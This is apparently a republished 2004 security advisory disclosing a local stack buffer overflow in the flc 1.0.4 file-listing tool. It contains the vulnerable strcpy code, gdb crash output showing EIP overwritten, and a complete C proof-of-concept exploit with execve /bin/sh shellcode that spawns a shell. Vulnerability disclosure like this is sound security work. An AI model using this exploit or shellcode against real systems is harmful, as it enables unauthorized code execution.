06 - flc <= 1.0.4 Local Stack Buffer Overflow Vulnerability

eZine lover (@eZine)

Published in 

Advisory

 · 1 year ago

No System Group - Advisory #06 - 24/09/04

• Program: flc
• Homepage: http://ucon64.sourceforge.net/
• Vulnerable Versions: flc 1.0.4 and prior
• Risk: Low / Medium
• Impact: Local Stack Buffer Overflow Vulnerability

DESCRIPTION

This may be freely redistributed under the terms of the GNU Public License flc lists information about the files in a directory, like 'ls' or 'dir' commands from the fileutils package. But in addition, it shows FILE_ID.DIZ information (from files and archives), ID3 tags (MP3), and MET files (eDonkey or Overnet) It is very useful for FTP admins or people who have a lot to do with files.

More informations at: http://ucon64.sourceforge.net/

DETAILS

Due to an unsafe copying of parameters from the command line using strcpy() in flc.c, it is possible overwrite the return address:

--- flc.c --- 
140:  if (flc.html) 
141:    printf ("<html><head><title></title></head><body><pre><tt>"); 
142:  if (optind < argc) 
143:    { 
144:      while (optind < argc) 
145:        strcpy (path, argv[optind++]); 
146    } 
--- flc.c --- 

coki@nosystem:~$ flc `perl -e 'print "A" x 50000'` 
Segmentation fault 
coki@nosystem:~$ 

coki@nosystem:~$ gdb flc 
GNU gdb 6.1.1 
Copyright 2004 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i486-slackware-linux"...(no debugging symbols found) ...Using host libthread_db library "/lib/libthread_db.so.1". 

(gdb) r `perl -e 'print "A" x 25632'` 
Starting program: /home/coki/audit/flc-1.0.4-linux-bin/bin/flc `perl -e 'print " A" x 25632'` 
(no debugging symbols found)...(no debugging symbols found)...install.sh   N 120  11-03-02  install.sh 
flc          N  20448  11-03-02  flc 
txtextract   N  13964  11-03-02  txtextract 
id3extract   N  16876  11-03-02  id3extract 
metextract   N  16268  11-03-02  metextract 

Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 
(gdb) i r esp ebp eip 
esp            0xbfff91d0       0xbfff91d0 
ebp            0x41414141       0x41414141 
eip            0x41414141       0x41414141 
(gdb) q 
The program is running.  Exit anyway? (y or n) y 
coki@nosystem:~$

EXPLOIT

------------------ flc_exp.c -------------------- 
/* flc <= 1.0.4 local stack buffer overflow exploit 
   (Proof of Concept) 

   Tested in Slackware 10.0 

   by CoKi <coki@nosystem.com.ar> 
   No System Group - http://www.nosystem.com.ar 
*/ 

#include <stdio.h> 
#include <strings.h> 

#define BUFFER 25632 + 1 

char shellcode[]= 
		"\x31\xc0"                         /* xor %eax,%eax    */ 
		"\x31\xd2"                         /* xor %edx,%edx    */ 
		"\x52"                             /* push %edx        */ 
		"\x68\x2f\x2f\x73\x68"             /* push $0x68732f2f */ 
		"\x68\x2f\x62\x69\x6e"             /* push $0x6e69622f */ 
		"\x89\xe3"                         /* movl %esp,%ebx   */ 
		"\x52"                             /* push %edx        */ 
		"\x53"                             /* push %ebx        */ 
		"\x89\xe1"                         /* movl %esp,%ecx   */ 
		"\xb0\x0b"                         /* mov $0xb,%al     */ 
		"\xcd\x80";                        /* int $0x80        */ 

int main(int argc, char *argv[]) { 

	char *env[3] = {shellcode, NULL}; 
	char buf[BUFFER], *path; 
	int *buffer = (int *) (buf); 
	int i, ret; 

	if(argc != 2) { 
		printf(" use: %s <path>\n", argv[0]); 
		exit(0); 
	} 

	path = argv[1]; 

	ret = 0xbffffffa - strlen(shellcode) - strlen(path); 

	for(i=0; i<=BUFFER; i+=4) 
	*buffer++ = ret; 

	printf("\n flc <= 1.0.4 local stack buffer overflow (Proof of Concept)\n"); 
	printf(" by CoKi <coki@nosystem.com.ar>\n\n"); 

	execle(path, "flc", buf, NULL, env); 
} 

------------------ flc_exp.c -------------------- 

coki@servidor:~$ make flc_exp 
coki@servidor:~$ ./flc_exp /home/coki/audit/flc-1.0.4-linux-bin/bin/flc 

 flc <= 1.0.4 local stack buffer overflow (Proof of Concept) 
 by CoKi <coki@nosystem.com.ar> 

WARNING: /home/coki/audit/flc-1.0.4-linux-bin/bin/.flcrc not found: creating...OK 

install.sh   N    120  11-03-02  install.sh 
flc          N  20448  11-03-02  flc 
txtextract   N  13964  11-03-02  txtextract 
id3extract   N  16876  11-03-02  id3extract 
metextract   N  16268  11-03-02  metextract 
flc_exp.c    N   1425  09-24-04  flc_exp.c 
flc_exp      N  11336  09-24-04  flc_exp 
.flcrc       N   1162  09-24-04  .flcrc 
sh-2.05b$

'flc' is not setuid by default :(

SOLUTIONS

No yet

REFERENCES

http://www.nosystem.com.ar/advisories/advisory-06.txt

CREDITS

Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar